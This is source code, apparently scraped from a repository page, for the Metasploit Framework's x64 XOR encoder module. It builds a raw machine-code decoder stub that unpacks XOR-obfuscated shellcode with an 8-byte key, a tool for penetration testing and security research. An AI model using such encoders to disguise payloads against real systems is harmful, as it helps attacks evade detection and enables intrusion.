Path: blob/master/modules/encoders/x64/xor.rb
19670 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'XOR Encoder',10'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.',11'Author' => [ 'sf' ],12'Arch' => ARCH_X64,13'License' => MSF_LICENSE,14'Decoder' => {15'KeySize' => 8,16'KeyPack' => 'Q',17'BlockSize' => 818}19)20end2122# Indicate that this module can preserve some registers23# ...which is currently not true. This is a temp fix24# until the full preserve_registers functionality is25# implemented.26def can_preserve_registers?27true28end2930def decoder_stub(state)31# calculate the (negative) block count . We should check this against state.badchars.32block_count = [-(((state.buf.length - 1) / state.decoder_key_size) + 1)].pack('V')3334decoder = "\x48\x31\xC9" + # xor rcx, rcx35"\x48\x81\xE9" + block_count + # sub ecx, block_count36"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]37"\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????38"\x48\x31\x58\x27" + # xor [rax+0x27], rbx39"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -840"\xE2\xF4" # loop 0x1B4142state.decoder_key_offset = decoder.index('XXXXXXXX')4344return decoder45end46end474849